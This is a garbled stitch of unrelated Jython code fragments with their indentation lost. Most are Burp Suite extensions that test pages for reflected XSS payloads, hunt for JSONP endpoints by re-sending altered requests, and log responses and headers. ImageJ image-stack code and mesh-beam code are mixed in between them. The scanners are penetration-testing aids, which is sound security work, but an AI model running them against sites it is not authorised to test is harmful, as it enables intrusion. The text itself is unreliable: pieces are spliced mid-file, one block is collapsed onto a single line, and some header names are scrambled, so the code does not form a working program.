responseInfo = self._helpers.analyzeResponse(response.getResponse())
analyzedResponse = self._helpers.bytesToString(response.getResponse(
)) # change body offeset + make ui for affeccted pages
responseBody = analyzedResponse.encode('utf-8')
vulnOrNot = 'no'
if currentPayload in responseBody:
self.printLog('payload: ' + currentPayload +
' found to be vulnarble')
vulnOrNot = 'yes'
# mark the payload
if not len(self.affectedResponses) == 0:
for request in self.affectedResponses: # bug in case of no response in messageinfo
self.printLog('checking affeccted page' +
str(request.getUrl()))
requestURL = request.getUrl()
httpService = self._helpers.buildHttpService(
str(requestURL.getHost()), int(requestURL.getPort()),
requestURL.getProtocol() == "https")
affectedPageResponse = self._callbacks.makeHttpRequest(
httpService, request.getRequest())
analyzedResponse = self._helpers.bytesToString(
affectedPageResponse.getResponse())
responseBody = analyzedResponse.encode('utf-8')
if currentPayload in responseBody:
vulnOrNot = 'yes, affected page'
self.printLog('affeccted page has been found as vulnerable')
self._lock.acquire()
row = self._log.size()
self._log.add(
LogEntry(
self._helpers.analyzeRequest(response).getUrl(),
self._callbacks.saveBuffersToTempFiles(response),
currentPayload, vulnOrNot))
self.fireTableRowsInserted(row, row)
self._lock.release()
def checkForKey(self, messageInfo):
currentPayload = self.tagPayloads[0]
requestInfo = self._helpers.analyzeRequest(messageInfo)
requestHeaders = list(requestInfo.getHeaders())
requestURL = requestInfo.getUrl()
urlStr = str(requestURL)
self.printLog('checking for xss key in URL: ' + urlStr)
requestBody = self._helpers.bytesToString(messageInfo.getRequest())
requestBody = re.sub(
'Referer:.*\n', '', requestBody, flags=re.MULTILINE,
count=1) # workaround avoid xsskey in the referer newHeaders
if self.xssKey in urlStr or self.xssKey in requestBody:
self.printLog('xss key has been found')
if self.bruteForceMode.isSelected():
for i in range(0, self.payloadsModel.getSize()):
payload = self.payloadsModel.getElementAt(i)
self.checkXSS(messageInfo, urlStr, requestBody, payload)
else:
self.checkXSS(messageInfo, urlStr, requestBody,
self.basicPayloadTxt.getText())
#
# extend AbstractTableModel
#
def getRowCount(self):
try:
return self._log.size()
except:
return 0
def getColumnCount(self):
return 3
def getColumnName(self, columnIndex):
if columnIndex == 0:
return "URL"
if columnIndex == 1:
return "Payload"
if columnIndex == 2:
return "Vulnerable?"
return ""
def getValueAt(self, rowIndex, columnIndex):
logEntry = self._log.get(rowIndex)
if columnIndex == 0:
# return self._callbacks.getToolName(logEntry._tool)
return logEntry._url.toString()
if columnIndex == 1:
return logEntry._payload
if columnIndex == 2:
return logEntry._vulnOrNot
return ""
#
# implement IMessageEditorController
# this allows our request/response viewers to obtain details about the messages being displayed
#
def getHttpService(self):
return self._currentlyDisplayedItem.getHttpService()
def getRequest(self):
return self._currentlyDisplayedItem.getRequest()
def getResponse(self):
return self._currentlyDisplayedItem.getResponse()
def startOrStop(self, event):
if self.startButton.getText() == "XSSor is off":
self.startButton.setText("XSSor is on")
self.startButton.setBackground(Color.GREEN)
self.printLog('on, waiting for key word to be found (' +
self.xssKey + ')')
self.intercept = 1
else:
self.startButton.setText("XSSor is off")
self.startButton.setBackground(Color(255, 100, 91, 255))
self.intercept = 0
def clearAPList(self, event):
self.affectedModel.clear()
self.affectedResponses = ArrayList()
#
# implement IContextMenuFactory
#
def createMenuItems(self, invocation):
responses = invocation.getSelectedMessages()
if responses > 0:
ret = LinkedList()
affectedMenuItem = JMenuItem("XSSor: Add affected page")
affectedMenuItem.addActionListener(
handleMenuItems(self, responses[0], "affected"))
ret.add(affectedMenuItem)
return (ret)
return null
def addAfectedPage(self, messageInfo):
self.affectedModel.addElement(
str(self._helpers.analyzeRequest(messageInfo).getUrl()))
self.affectedResponses.add(messageInfo)
class BurpExtender(IBurpExtender, ITab, IHttpListener, IMessageEditorController, AbstractTableModel):
#
# implement IBurpExtender
#
def registerExtenderCallbacks(self, callbacks):
# keep a reference to our callbacks object
self._callbacks = callbacks
# obtain an extension helpers object
self._helpers = callbacks.getHelpers()
# set our extension name
callbacks.setExtensionName("Custom logger")
# create the log and a lock on which to synchronize when adding log entries
self._log = ArrayList()
self._lock = Lock()
# main split pane
self._splitpane = JSplitPane(JSplitPane.VERTICAL_SPLIT)
# table of log entries
logTable = Table(self)
scrollPane = JScrollPane(logTable)
self._splitpane.setLeftComponent(scrollPane)
# tabs with request/response viewers
tabs = JTabbedPane()
self._requestViewer = callbacks.createMessageEditor(self, False)
self._responseViewer = callbacks.createMessageEditor(self, False)
tabs.addTab("Request", self._requestViewer.getComponent())
tabs.addTab("Response", self._responseViewer.getComponent())
self._splitpane.setRightComponent(tabs)
# customize our UI components
callbacks.customizeUiComponent(self._splitpane)
callbacks.customizeUiComponent(logTable)
callbacks.customizeUiComponent(scrollPane)
callbacks.customizeUiComponent(tabs)
# add the custom tab to Burp's UI
callbacks.addSuiteTab(self)
# register ourselves as an HTTP listener
callbacks.registerHttpListener(self)
return
#
# implement ITab
#
def getTabCaption(self):
return "Logger"
def getUiComponent(self):
return self._splitpane
#
# implement IHttpListener
#
def processHttpMessage(self, toolFlag, messageIsRequest, messageInfo):
# only process response
if not messageIsRequest:
# create a new log entry with the message details
self._lock.acquire()
row = self._log.size()
self._log.add(LogEntry(toolFlag, self._callbacks.saveBuffersToTempFiles(messageInfo), self._helpers.analyzeRequest(messageInfo).getUrl()))
self.fireTableRowsInserted(row, row)
self._lock.release()
return
#
# extend AbstractTableModel
#
def getRowCount(self):
try:
return self._log.size()
except:
return 0
def getColumnCount(self):
return 2
def getColumnName(self, columnIndex):
if columnIndex == 0:
return "Tool"
if columnIndex == 1:
return "URL"
return ""
def getValueAt(self, rowIndex, columnIndex):
logEntry = self._log.get(rowIndex)
if columnIndex == 0:
return self._callbacks.getToolName(logEntry._tool)
if columnIndex == 1:
return logEntry._url.toString()
return ""
#
# implement IMessageEditorController
# this allows our request/response viewers to obtain details about the messages being displayed
#
def getHttpService(self):
return self._currentlyDisplayedItem.getHttpService()
def getRequest(self):
return self._currentlyDisplayedItem.getRequest()
def getResponse(self):
return self._currentlyDisplayedItem.getResponse()
# extracting stack time frames and convert to ortho
imp = IJ.getImage()
stkA = ArrayList()
for i in range(1, 4):
#for i in range(1, imp.getNFrames()):
e4d = Extractfrom4D()
e4d.setGstarttimepoint(i)
IJ.log("current time point" + str(i))
aframe = e4d.coreheadless(imp, 3)
ortho = XYZMaxProject(aframe)
orthoimp = ortho.getXYZProject()
stkA.add(orthoimp)
#orthoimp.show()
stk = ImageStack(stkA.get(0).getWidth(), stkA.get(0).getHeight())
for item in stkA:
stk.addSlice("slcie", item.getProcessor())
out = ImagePlus("out", stk)
#out.setCalibration(imp.getCalibration().copy())
IJ.run(out, "Grays", "");
IJ.run(out, "RGB Color", "");
# load data from file
filepath = '/Users/miura/Dropbox/Mette/20_23h/20_23hrfull_corrected_1_6_6_netdispZ40.csv'
filename = os.path.basename(filepath)
newfilename = os.path.join(os.path.splitext(filename)[0], '_plotStack.tif')
out.setTitle(os.path.basename(filename)+'_OutStack.tif')
PLOT_ONLY_IN_FRAME1 = False
class BurpExtender(IBurpExtender, ITab, IScannerCheck, IMessageEditorController, AbstractTableModel):
#
# implement IBurpExtender
#
def registerExtenderCallbacks(self, callbacks):
# keep a reference to our callbacks object
self._callbacks = callbacks
# obtain an extension helpers object
self._helpers = callbacks.getHelpers()
# set our extension name
callbacks.setExtensionName("JSONP Hunter")
# create the log and a lock on which to synchronize when adding log entries
self._log = ArrayList()
self._lock = Lock()
# main split pane
self._splitpane = JSplitPane(JSplitPane.VERTICAL_SPLIT)
# table of log entries
logTable = Table(self)
scrollPane = JScrollPane(logTable)
self._splitpane.setLeftComponent(scrollPane)
# tabs with request/response viewers
tabs = JTabbedPane()
self._requestViewer = callbacks.createMessageEditor(self, False)
self._responseViewer = callbacks.createMessageEditor(self, False)
tabs.addTab("Request", self._requestViewer.getComponent())
tabs.addTab("Response", self._responseViewer.getComponent())
self._splitpane.setRightComponent(tabs)
# customize our UI components
callbacks.customizeUiComponent(self._splitpane)
callbacks.customizeUiComponent(logTable)
callbacks.customizeUiComponent(scrollPane)
callbacks.customizeUiComponent(tabs)
# add the custom tab to Burp's UI
callbacks.addSuiteTab(self)
# register ourselves as an HTTP listener
callbacks.registerScannerCheck(self)
# id for column
self.id = 0
return
#
# implement ITab
#
def getTabCaption(self):
return "JsonpHunter"
def getUiComponent(self):
return self._splitpane
#
# implement IHttpListener
#
# def processHttpMessage(self, toolFlag, messageIsRequest, messageInfo):
# # only process requests
# if messageIsRequest:
# return
# # create a new log entry with the message details
# self._lock.acquire()
# row = self._log.size()
# self._log.add(LogEntry(toolFlag, self._callbacks.saveBuffersToTempFiles(messageInfo), self._helpers.analyzeRequest(messageInfo).getUrl()))
# self.fireTableRowsInserted(row, row)
# self._lock.release()
# implement IScannerCheck
def doActiveScan(self,baseRequestResponse,insertionPoint):
pass
def doPassiveScan(self,baseRequestResponse):
self.baseRequestResponse = baseRequestResponse
# service = baseRequestResponse.getHttpService()
result = self.scancheck(baseRequestResponse)
if result != [] and result !='' and result != None:
param,url = result
self.id +=1
#analyze_request = self._helpers.analyzeRequest(service,baseRequestResponse.getRequest())
self._lock.acquire()
row = self._log.size()
self._log.add(LogEntry(self.id,baseRequestResponse,param,url))
self.fireTableRowsInserted(row, row)
self._lock.release()
return
#
# extend AbstractTableModel
#
def scancheck(self,baseRequestResponse):
host,port,protocol,method,headers,params,url,reqBodys,analyze_request = self.Get_RequestInfo(baseRequestResponse)
status_code,body = self.Get_ResponseInfo(baseRequestResponse)
"""
deal with black_list if path like xxx.jpg or xxx.jpeg
"""
parse_url = urlparse(url.toString())
url_path = parse_url.path
if url_path != '':
if '.' in url_path:
if url_path.split('.')[-1:][0] in black_list:
return ''
if method == "GET":
if params !='':
"""
extract value in response use value({}) like jsonp
"""
split_params = params.split('&')
for param in split_params:
if '=' in param:
if len(param.split('=')) == 2:
key,value = param.split('=')
if value !='':
jsonp_pattern = value + '\(\{.*?\}\)'
re_result = re.findall(jsonp_pattern,body,re.S)
if re_result:
return [key,url.toString()]
"""
extract use jsonp_string
"""
againReq_headers = headers
againReq_headers[0] = headers[0].replace(params,params+jsonp_string)
againReq = self._helpers.buildHttpMessage(againReq_headers,reqBodys)
if protocol == 'https':
is_https = True
else:
is_https = False
againRes = self._callbacks.makeHttpRequest(host, port, is_https, againReq)
analyze_againRes = self._helpers.analyzeResponse(againRes)
againResBodys = againRes[analyze_againRes.getBodyOffset():].tostring()
for key,value in jsonp_dict.items():
jsonp_pattern = value + '\(\{.*?\}\)'
re_result = re.findall(jsonp_pattern,againResBodys,re.S)
if re_result:
link = againReq_headers[0].split(' ')[1]
host = againReq_headers[1].split(' ')[1]
url = protocol+'://'+host+link
return [key,str(url)]
"""
extract use jsonp_string with no params
"""
else:
if '?' not in url.toString():
path = headers[0].split(' ')[1]
againReq_headers_use_noparam = headers
againReq_headers_use_noparam[0] = headers[0].replace('GET '+path,'GET '+path+'?'+jsonp_string[1:])
againReq = self._helpers.buildHttpMessage(againReq_headers_use_noparam, reqBodys)
if protocol == 'https':
is_https = True
else:
is_https = False
againRes = self._callbacks.makeHttpRequest(host, port, is_https, againReq)
analyze_againRes = self._helpers.analyzeResponse(againRes)
againResBodys = againRes[analyze_againRes.getBodyOffset():].tostring()
for key,value in jsonp_dict.items():
jsonp_pattern = value + '\(\{.*?\}\)'
re_result = re.findall(jsonp_pattern,againResBodys,re.S)
if re_result:
link = againReq_headers_use_noparam[0].split(' ')[1]
host = againReq_headers_use_noparam[1].split(' ')[1]
url = protocol+'://'+host+link
return [key,str(url)]
return ''
def Get_RequestInfo(self,baseRequestResponse):
"""
extract about service
"""
service = baseRequestResponse.getHttpService()
host = service.getHost()
port = service.getPort()
protocol = service.getProtocol()
"""
extract request
"""
analyze_request = self._helpers.analyzeRequest(service,baseRequestResponse.getRequest())
reqBodys = baseRequestResponse.getRequest()[analyze_request.getBodyOffset():].tostring()
url = analyze_request.getUrl()
headers = analyze_request.getHeaders()
method = analyze_request.getMethod()
params = [i for i in analyze_request.getParameters() if i.getType() == IParameter.PARAM_URL]
extract_params = '&'.join([('%s=%s' % (c.getName(),c.getValue())) for c in params ])
return host,port,protocol,method,headers,extract_params,url,reqBodys,analyze_request
def Get_ResponseInfo(self,baseRequestResponse):
"""
extract response
"""
analyze_response = self._helpers.analyzeResponse(baseRequestResponse.getResponse())
status_code = analyze_response.getStatusCode()
body = baseRequestResponse.getResponse()[analyze_response.getBodyOffset():].tostring()
return status_code,body
def getRowCount(self):
try:
return self._log.size()
except:
return 0
def getColumnCount(self):
return 3
def getColumnName(self, columnIndex):
if columnIndex == 0:
return "ID"
if columnIndex == 1:
return "PARAM"
if columnIndex == 2:
return "URL"
return ""
def getValueAt(self, rowIndex, columnIndex):
logEntry = self._log.get(rowIndex)
if columnIndex == 0:
return logEntry._id
if columnIndex == 1:
return logEntry._param
if columnIndex == 2:
return logEntry._url
return ""
#
# implement IMessageEditorController
# this allows our request/response viewers to obtain details about the messages being displayed
#
def getHttpService(self):
return self._currentlyDisplayedItem.getHttpService()
def getRequest(self):
return self._currentlyDisplayedItem.getRequest()
def getResponse(self):
return self._currentlyDisplayedItem.getResponse()
if listBeamId is None: listBeamId = TIntArrayList(100) bgroupMap.put(bId, listBeamId) listBeamId.add(i) vertices = ArrayList(newMesh.getBeams()) newMesh.resetBeams() mapGroupToListOfPolylines = LinkedHashMap() for bId in bgroupMap.keySet(): listBeamId = bgroupMap.get(bId) listOfPolylines = ArrayList() polyline = ArrayList() lastVertex = None for i in xrange(listBeamId.size()): b = listBeamId.get(i) if lastVertex != vertices.get(2*b): # New polyline polyline = ArrayList() listOfPolylines.add(polyline) polyline.add(vertices.get(2*b)) lastVertex = vertices.get(2*b+1) polyline.add(lastVertex) #print "Group "+str(bId)+" contains "+str(listOfPolylines.size())+" polylines and "+str(listBeamId.size()+1)+" vertices" mapGroupToListOfPolylines.put(bId, listOfPolylines) for bId in bgroupMap.keySet(): listBeamId = bgroupMap.get(bId) listOfPolylines = mapGroupToListOfPolylines.get(bId) nrPoly = listOfPolylines.size() for numPoly in xrange(nrPoly): polyline = listOfPolylines.get(numPoly)
class BurpExtender(IBurpExtender, ITab, IHttpListener, IMessageEditorController, AbstractTableModel):
# TODO better way?
headers_seen = []
#
# implement IBurpExtender
#
def registerExtenderCallbacks(self, callbacks):
# keep a reference to our callbacks object
self._callbacks = callbacks
# obtain an extension helpers object
self._helpers = callbacks.getHelpers()
# set our extension name
callbacks.setExtensionName("Response headers")
# create the log and a lock on which to synchronize when adding log entries
self._log = ArrayList()
self._lock = Lock()
# main split pane
self._splitpane = JSplitPane(JSplitPane.VERTICAL_SPLIT)
# table of log entries
logTable = Table(self)
scrollPane = JScrollPane(logTable)
self._splitpane.setLeftComponent(scrollPane)
# tabs with request/response viewers
tabs = JTabbedPane()
self._requestViewer = callbacks.createMessageEditor(self, False)
self._responseViewer = callbacks.createMessageEditor(self, False)
tabs.addTab("Request", self._requestViewer.getComponent())
tabs.addTab("Response", self._responseViewer.getComponent())
self._splitpane.setRightComponent(tabs)
# customize our UI components
callbacks.customizeUiComponent(self._splitpane)
callbacks.customizeUiComponent(logTable)
callbacks.customizeUiComponent(scrollPane)
callbacks.customizeUiComponent(tabs)
# add the custom tab to Burp's UI
callbacks.addSuiteTab(self)
# register ourselves as an HTTP listener
callbacks.registerHttpListener(self)
return
#
# implement ITab
#
def getTabCaption(self):
return "Response Headers"
def getUiComponent(self):
return self._splitpane
#
# implement IHttpListener
#
def processHttpMessage(self, toolFlag, messageIsRequest, messageInfo):
# TODO make this configurable in the UI
boring_headers = ["ETag", "P3P", "Date", "Vary", "Content-Length", "Cteonnt-Length", "ntCoent-Length", "Keep-Alive", "Connection", "Content-Type", "Accept-Ranges", "Last-Modified", "Content-Language", "Cache-Control", "Expires", "Content-Location", "Location", "Set-Cookie", "Age", "X-Varnish"]
# convert to lower case
boring_headers = [x.lower() for x in boring_headers]
# only process requests
if not messageIsRequest:
# create a new log entry with the message details
self._lock.acquire()
row = self._log.size()
# TODO possible to use analyseResponse?
response = messageInfo.getResponse().tostring()
# TODO possible to use getHeaders()?
if "\r\n\r\n" in response:
headers,body = response.split("\r\n\r\n", 1)
# split out each header
if "\n" in headers:
headers = headers.split("\n")
for header in headers:
# Skip HTTP verb and other lines without ':'
if ": " in header:
# split on 1st colon
header_name,header_val = header.split(": ", 1)
# insert an entry if the header is 'interesting'
if header_name.lower() not in boring_headers:
# and we haven't seen this name,value pair before
if header not in self.headers_seen:
self.headers_seen.append(header)
print header
self._log.add(LogEntry(header, self._callbacks.saveBuffersToTempFiles(messageInfo), self._helpers.analyzeRequest(messageInfo).getUrl()))
self.fireTableRowsInserted(row, row)
self._lock.release()
return
#
# extend AbstractTableModel
#
def getRowCount(self):
try:
return self._log.size()
except:
return 0
def getColumnCount(self):
return 2
def getColumnName(self, columnIndex):
if columnIndex == 0:
return "Header"
if columnIndex == 1:
return "URL"
return ""
def getValueAt(self, rowIndex, columnIndex):
logEntry = self._log.get(rowIndex)
if columnIndex == 0:
#return self._callbacks.getToolName(logEntry._tool)
return logEntry._header
if columnIndex == 1:
return logEntry._url.toString()
return ""
#
# implement IMessageEditorController
# this allows our request/response viewers to obtain details about the messages being displayed
#
def getHttpService(self):
return self._currentlyDisplayedItem.getHttpService()
def getRequest(self):
return self._currentlyDisplayedItem.getRequest()
def getResponse(self):
return self._currentlyDisplayedItem.getResponse()